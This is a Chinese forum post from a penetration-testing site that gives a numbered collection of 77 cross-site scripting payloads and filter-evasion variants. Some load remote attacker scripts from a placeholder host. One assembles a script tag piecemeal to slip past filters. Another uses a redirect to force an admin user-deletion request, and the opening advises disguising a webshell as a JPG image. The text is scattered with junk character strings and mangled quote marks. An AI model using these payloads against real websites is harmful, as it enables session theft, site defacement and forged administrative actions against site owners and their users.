中国网络渗透测试联盟
标题:
xss详细利用大全1
[打印本页]
作者:
admin
时间:
2012-9-13 17:04
标题:
xss详细利用大全1
跨站图片shell
- ^: H- r" T! k) @ d1 t) d
XSS跨站代码 <script>alert("")</script>
2 x1 k; Y1 v( T: e
( t6 z7 ^9 ^9 S; x
将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马
/ H) G$ t8 r& S4 ]: m
: G( B: ^4 j e+ U
8 m; b4 ~8 J& l' X8 V
7 A5 ?! s$ W9 I& X5 ]2 K" r
1)普通的XSS JavaScript注入
& |1 r' s; o; v* }* r
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
( D1 k+ f: A# y3 f
/ j) g$ |$ j& b& j, Z! [$ ?
(2)IMG标签XSS使用JavaScript命令
' P$ R1 a. Y# g* y
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
3 v' [- b9 H6 p
7 c: g1 k# c; k5 e3 U$ I3 _0 l2 y
(3)IMG标签无分号无引号
7 E; H! {/ O9 {) t; E4 L
<IMG SRC=javascript:alert(‘XSS’)>
/ N6 D( |( Q* P4 L) L( V; ?
( C7 B5 v- E$ F- }( @7 @2 l" P
(4)IMG标签大小写不敏感
1 q$ n6 Q2 E+ m) l$ d, ?- R* J
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
3 }& W5 C& n% o1 i: F1 D! E
5 [" } A8 q5 i
(5)HTML编码(必须有分号)
+ J8 O R% P4 v- p* {) U0 w A
<IMG SRC=javascript:alert(“XSS”)>
7 T9 I8 j5 B( D; Y! N3 ?+ t; |
* _/ y" s# v" _
(6)修正缺陷IMG标签
2 r; [( Q) s4 I3 g& A
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
2 e) ~( C7 U, Y2 q& v
6 M. X; ^/ B1 T( f
(7)formCharCode标签(计算器)
6 ?3 j$ H! _8 v# {
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
" I- r& a, m/ P
$ Z. R q& n7 T( {& n
(8)UTF-8的Unicode编码(计算器)
( r2 o. s6 g. u0 u& z. }
<IMG SRC=jav..省略..S')>
( M6 e* a7 |/ a' J! ]2 V
# b: z' {' l) b
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
! }: h5 g$ P, z' j# U P
<IMG SRC=jav..省略..S')>
) c( i* j! ?$ z5 z3 t! S
! Z b3 F: \9 O. Q% w* T
(10)十六进制编码也是没有分号(计算器)
1 ]: F, s5 o6 d% T( W
<IMG SRC=java..省略..XSS')>
/ j! C* y, z: M
" Z/ L" G$ d+ {7 J* w" @
(11)嵌入式标签,将Javascript分开
+ X) |; I3 x D
<IMG SRC=”jav ascript:alert(‘XSS’);”>
4 b4 ?. w( d3 v( L3 ^
) m' O; P7 x% ^# \8 o* X7 t5 y
(12)嵌入式编码标签,将Javascript分开
2 l! o* ~, r1 S4 e! y [
<IMG SRC=”jav ascript:alert(‘XSS’);”>
+ b) C m& _4 I1 N
$ Z# o1 m" y( z5 k! n6 W
(13)嵌入式换行符
; Q- w$ o0 W$ n0 v
<IMG SRC=”jav ascript:alert(‘XSS’);”>
1 `1 a) F: W/ C! {6 A' o
* W2 }3 k3 w; `& _# b. K' O0 `
(14)嵌入式回车
3 P' y, f! F* x$ f# e
<IMG SRC=”jav ascript:alert(‘XSS’);”>
; i" t7 c3 s6 m# }6 z: O" {4 H4 v" e, g
/ v8 L" x" X% \8 X
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
0 o" {% ]* t1 d, R
<IMG SRC=”javascript:alert(‘XSS‘)”>
' N$ o" E6 f- r5 |& T* U, e- J
/ w4 z7 ]5 P8 P" A
(16)解决限制字符(要求同页面)
7 _: O" Q. r, M( a
<script>z=’document.’</script>
/ x. i6 p) n% l3 t
<script>z=z+’write(“‘</script>
' |$ b, J- y: T# j4 m
<script>z=z+’<script’</script>
. p& c1 v- |; K b
<script>z=z+’ src=ht’</script>
( `/ I) Z; I$ H' q
<script>z=z+’tp://ww’</script>
^$ ~! ]/ H. b% E% U
<script>z=z+’w.shell’</script>
; C% p7 z$ T2 r0 w. k
<script>z=z+’.net/1.’</script>
+ c- H Q4 k/ j& A6 {! s6 } {& ]
<script>z=z+’js></sc’</script>
, _/ x `' E+ Q% I* f
<script>z=z+’ript>”)’</script>
; P' i' s& W3 F* G, u& v
<script>eval_r(z)</script>
+ T' q2 l3 ` R8 X5 s6 D7 {
1 n3 L! b# I. N( g
(17)空字符
. N" B$ p! i4 J6 [$ v
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
' {# P1 N+ ?- j% s) b
# r) \" C3 p5 A
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
0 R- N2 j7 [3 Z x# G6 b
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
7 V9 }+ @5 s7 y5 L: X6 q
3 n1 P# ?% \9 Z: T
(19)Spaces和meta前的IMG标签
$ @$ b# j7 a9 F. G4 j
<IMG SRC=” javascript:alert(‘XSS’);”>
& m" I4 L+ a6 `" x- q, A! w
7 J5 B, u& a3 \. n
(20)Non-alpha-non-digit XSS
9 j. ?; Q) N( e4 P; x9 z$ i
<SCRIPT/XSS SRC=”
http://3w.org/XSS/xss.js
”></SCRIPT>
4 [* c0 m& S9 ], l' H) e |
; c5 o0 X/ q3 p' q( \( w3 {6 C) ~
(21)Non-alpha-non-digit XSS to 2
: d* w- S: T! l
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
! h3 C' |% t% y& H3 f6 E1 O
b; W" g4 E! Y/ T$ l+ P
(22)Non-alpha-non-digit XSS to 3
9 P4 S. b4 p, Y# [ R$ f# C4 F. U, o
<SCRIPT/SRC=”
http://3w.org/XSS/xss.js
”></SCRIPT>
& X% k: D9 q; i& ?2 E
# G4 f" M9 Y) Y& J* q
(23)双开括号
1 W' d0 E1 m6 Z- g
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
6 N0 }0 l4 t# ]6 L
$ H- B- e0 c* S( b$ u
(24)无结束脚本标记(仅火狐等浏览器)
) b5 x) U2 b; T6 Z7 ^ ^
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
$ j, k: |) L7 T
7 [& L8 ~( S' n \/ F$ H
(25)无结束脚本标记2
+ v' s h- E5 |( U- p
<SCRIPT SRC=//3w.org/XSS/xss.js>
6 l# t+ d d+ i8 M4 Y7 n. ~; U# C
. I/ H x1 l. v, ]6 r
(26)半开的HTML/JavaScript XSS
- x# N8 t0 D) L' F
<IMG SRC=”javascript:alert(‘XSS’)”
1 K! z$ N) t! [4 d. x
6 A- ?$ l6 J" e7 [& c
(27)双开角括号
8 ~. N, k5 s& m) m
<iframe src=http://3w.org/XSS.html <
2 Y& A; [+ w- r( N
! u) h4 }! o, f$ T* J! D y6 f$ [
(28)无单引号 双引号 分号
7 ~* y9 V& g$ m" B- \9 `, t6 v' ^
<SCRIPT>a=/XSS/
. Q& E7 v4 S" D
alert(a.source)</SCRIPT>
% `" `2 D, K# C* o- N U
& y6 G* Q4 p2 R6 s/ v4 Q
(29)换码过滤的JavaScript
: T1 E+ V* F4 a0 F( D1 d
\”;alert(‘XSS’);//
! H6 p9 y9 H' X2 Q. j R0 m. Q
* ~( K& U/ ]$ l8 m" n5 K
(30)结束Title标签
7 O, W2 @5 j! \* O; c7 C- e( W
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
& p; \, q; b6 H6 ?; K
* M! j: V! d, F
(31)Input Image
% d- M. d, R6 T7 M# ?
<INPUT SRC=”javascript:alert(‘XSS’);”>
- i0 C! v1 O; G7 ~6 ^) S U1 z
* ?1 c# ]1 w* U- S% f- h# A
(32)BODY Image
% n* a- N5 Y O9 b: H7 @' B) Y
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
$ P- o) Y; J4 x) l* ]
- v1 O2 d: E8 P' T
(33)BODY标签
* c7 t% l \; ^
<BODY(‘XSS’)>
/ U0 y3 W$ a6 L- s
7 n; n; s' v% F9 Y! _4 O: b
(34)IMG Dynsrc
s) Z! q H/ H0 l4 o# Z
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
+ T) {# [0 S( Y( I8 {
0 V# c o; J$ ]1 x' S
(35)IMG Lowsrc
; B: }1 X9 w; P9 x5 `/ J' Z
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
0 s, ~, [' r2 \ F9 z' P
" B7 m# o8 ]' z7 L. \. o
(36)BGSOUND
0 R8 U! `0 O. a% {& E+ N. C
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
/ c, i3 ~ `$ S- ?
# F* m; D: I$ F4 t. W
(37)STYLE sheet
( u, I; F8 b n9 y0 x9 m
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
( R: T3 |, h0 | u+ }3 s6 _
- L( |* S( W; k3 h# d4 B0 Q- z
(38)远程样式表
( t0 r6 X! d; ^7 a" \( u% t
<LINK REL=”stylesheet” HREF=”
http://3w.org/xss.css
”>
H1 ]% P* g& G; b% I q1 v j
" x" \* o' P% Q. ~+ F9 m
(39)List-style-image(列表式)
& F+ n" |3 c* C5 I/ z5 G: j! `
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
; H$ H7 ?3 S* e) N- p
0 u3 V' j' H0 d1 [3 {( @5 U5 [
(40)IMG VBscript
* `' Z& g8 V9 e% T# `6 |( H
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
) @; p9 _4 N2 f9 B" G
! H% }8 Y! i! p( ~3 g
(41)META链接url
& e6 V) p; J: A6 D7 g; c' ~
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
4 Z6 Z, s/ [+ l1 B& d
: O. } {$ g, o/ r; i8 \
(42)Iframe
' [" H: L/ X1 f* F6 R, s8 H/ y
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
3 F; S' `- a" M
(43)Frame
- ?/ k- W8 |+ G) }
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
0 ]' m4 a# D4 J' r3 |
& O& l) d3 p- j, F4 j/ m
(44)Table
5 g: }% `2 c, D2 w
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
! b$ T7 J! m& ~
& N+ `* @1 F1 w+ n# ?
(45)TD
. U6 j$ H$ c" a% z# g
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
, n1 h, v& I) v# V
! g- y' i; E- N' c
(46)DIV background-image
# c2 v& L2 D; A5 V7 }
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
# I) Z6 s3 e# _% ~! `$ z
2 r& e& X( A& N) \" `
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
/ c+ q9 V9 [* Q* o! p
<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>
* Y: M8 B6 i6 q% W8 k
8 E' q3 a" c8 W) o# Z( V
(48)DIV expression
& A; V3 R! p5 {5 L7 |9 K/ Z
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
) @4 N: h, G' ^7 |
! A3 u6 t: e! H
(49)STYLE属性分拆表达
7 h: d- C. U. W0 K" Y, k0 M
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
2 O1 C, a! @- g5 u1 h9 n9 O) e% N8 a9 h- W
* F9 N! P) W2 l ^: i; Z
(50)匿名STYLE(组成:开角号和一个字母开头)
7 _% ]/ E# }! E/ y2 [* W
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
( U1 ^. I/ X1 M$ l$ v, l [/ E
" I* F, _' y- @9 n
(51)STYLE background-image
( B ~: r6 d4 e `. }! X7 u" d0 F6 n% P
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
: @1 j) u- l. e/ F
. e! i$ B; d8 B! L* |/ I- ^
(52)IMG STYLE方式
3 q* x/ X. [& |3 g1 B1 N$ p7 N
exppression(alert(“XSS”))’>
" x& [! N+ `8 _/ v4 a
; b; m7 A# q+ z8 S6 C1 V& R
(53)STYLE background
. D; t. d! l) _
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
3 Q6 G. a; O& m3 P, u) E
, w- T7 m# S% L1 u6 Z' U
(54)BASE
6 |% D% ^ Z2 D7 e) {
<BASE HREF=”javascript:alert(‘XSS’);//”>
/ Q& J1 [; M# g, T) Q/ \: t' m I
5 c# f) ]/ g4 y6 [( i
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
8 i- h! i3 u+ r* E: O9 z
<EMBED SRC=”
http://3w.org/XSS/xss.swf
” ></EMBED>
% D6 h- \+ x* D5 ?
8 F) a( i# B5 Y* z7 j
(56)在flash中使用ActionScrpt可以混进你XSS的代码
+ z4 O8 Q0 | o6 ?% I: y
a=”get”;
( d1 s. T U: x0 O" V) N H
b=”URL(\”";
6 M1 f3 x% T( \. {
c=”javascript:”;
+ U$ ~: o: D/ y' C% P
d=”alert(‘XSS’);\”)”;
1 s! O9 V! z1 {8 F
eval_r(a+b+c+d);
, r3 {2 T. l6 g) x S2 i7 K
# w9 E+ H9 k; Y2 ^
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
. ~3 s* L7 j9 J/ i: I5 N
<HTML xmlns:xss>
5 N, o- y; c# V, @! A
<?import namespace=”xss” implementation=”
http://3w.org/XSS/xss.htc
”>
# l: |# T! Q& Q
<xss:xss>XSS</xss:xss>
5 g& e& s7 ~" ~ M# t8 `
</HTML>
. L$ {/ o% I, }4 g
- k, y* C5 L! {. @0 Y/ k
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
$ f6 M L* d- n" f: s I
<SCRIPT SRC=””></SCRIPT>
# ?- }7 h8 H4 q
' R: o6 v% m' C) i
(59)IMG嵌入式命令,可执行任意命令
, R6 |+ N7 o6 i( \1 q# R. k, o# q3 h
<IMG SRC=”
http://www.XXX.com/a.php?a=b
”>
0 ~& \$ M+ w+ v! Y
6 R- i0 q1 `0 _1 V' |
(60)IMG嵌入式命令(a.jpg在同服务器)
. Y3 x* Q* t$ O. A
Redirect 302 /a.jpg
http://www.XXX.com/admin.asp&deleteuser
, E* O4 c. F4 h w1 B4 z
4 C: ]! d/ L i) X( x. \4 B
(61)绕符号过滤
R7 R* Y! f, D# `' T- g; l
<SCRIPT a=”>” SRC=”
http://3w.org/xss.js
”></SCRIPT>
# V$ Q4 |: B+ G6 C7 o
0 i7 G, R- F8 C0 x
(62)
% p$ A0 G$ ?* W; j# V
<SCRIPT =”>” SRC=”
http://3w.org/xss.js
”></SCRIPT>
$ m2 a/ X3 r W4 [- X4 _
! P+ \1 Z% |6 W2 M2 p$ w
(63)
' m8 S* y3 }& S
<SCRIPT a=”>” ” SRC=”
http://3w.org/xss.js
”></SCRIPT>
- u f" U$ A! O W3 _
4 b, Q. t0 Y w4 M
(64)
" \% c) G; U0 Q2 b% |, Y
<SCRIPT “a=’>’” SRC=”
http://3w.org/xss.js
”></SCRIPT>
# @. F% a, c9 x* Q* B
& k P6 t V4 B( Y" `
(65)
! {' N( F2 v: i" j
<SCRIPT a=`>` SRC=”
http://3w.org/xss.js
”></SCRIPT>
7 z% O1 B/ J0 W, E3 H p0 ~' W9 c7 @" e
4 Z7 w9 u1 Y) Y8 G2 X% M5 k! H
(66)
# _) d# _4 W7 G P
<SCRIPT a=”>’>” SRC=”
http://3w.org/xss.js
”></SCRIPT>
4 O/ Z3 F- ~! X( V& m7 Y2 F* D
9 Z* c0 w" H8 A: ~0 E) s
(67)
+ e% `" y0 ]5 w5 [, w# o/ E/ j
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”
http://3w.org/xss.js
”></SCRIPT>
2 O6 |0 `, g6 |! w- U9 r+ s% Y
/ `# y+ |3 F/ r7 c4 a
(68)URL绕行
# E: X; P: G2 U& C6 y' g8 `
<A HREF=”
http://127.0.0.1/
”>XSS</A>
: r/ ?7 w7 Y% n8 Z7 K
4 _- C- M9 |, z. A5 r
(69)URL编码
5 z% D$ W9 L8 H
<A HREF=”
http://3w.org
”>XSS</A>
: y% u1 E! X* s& H
* B! P) e/ J: x1 J
(70)IP十进制
7 F# T5 X1 C+ m; f ^4 @
<A HREF=”http://3232235521″>XSS</A>
$ T4 j/ j( Q, z& c/ k8 [$ u) W
2 N, S. q5 @; z( h6 A' E4 Q! a
(71)IP十六进制
1 O- H9 ]3 G3 p( o
<A HREF=”
http://0xc0.0xa8.0
×00.0×01″>XSS</A>
# _3 W( s+ ~+ y/ r2 X0 O
, ^/ U) |1 T3 @" b
(72)IP八进制
6 w& h* K8 k3 b& `# P; C+ x
<A HREF=”
http://0300.0250.0000.0001
″>XSS</A>
1 B' c+ s- _8 n* q4 y. x, `
# ^0 g6 \4 p' u' Q" n
(73)混合编码
% \% ?0 C4 ^( _
<A HREF=”h
4 s) {2 O) {& a, l& _1 i1 |
tt p://6 6.000146.0×7.147/”">XSS</A>
) H2 l, y5 {; P' b1 C0 X
9 U8 m2 z4 g+ [) o" A& f$ ` O v. o
(74)节省[http:]
' D7 n+ x# m& H
<A HREF=”//www.google.com/”>XSS</A>
! A* j0 d9 }- w+ [/ ^( ?
, g! h& I; Y: |( J6 B. w
(75)节省[www]
3 c" N$ q. z$ J* w$ z8 j
<A HREF=”
http://google.com/
”>XSS</A>
5 e' i- @6 f0 g. Y3 _
2 w. V2 y9 p3 Z; r# |
(76)绝对点绝对DNS
3 l( \% Q, z' t' y! r b
<A HREF=”
http://www.google.com./
”>XSS</A>
$ S% V0 Z1 V1 `7 f: T2 B1 K
1 [3 R7 R8 Q0 L
(77)javascript链接
! M6 I, i& H5 q$ X& _ G0 F
<A HREF=”javascript:document.location=’
http://www.google.com/
’”>XSS</A>
2 A3 G& r* l) ^0 I+ y& l0 E' W
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2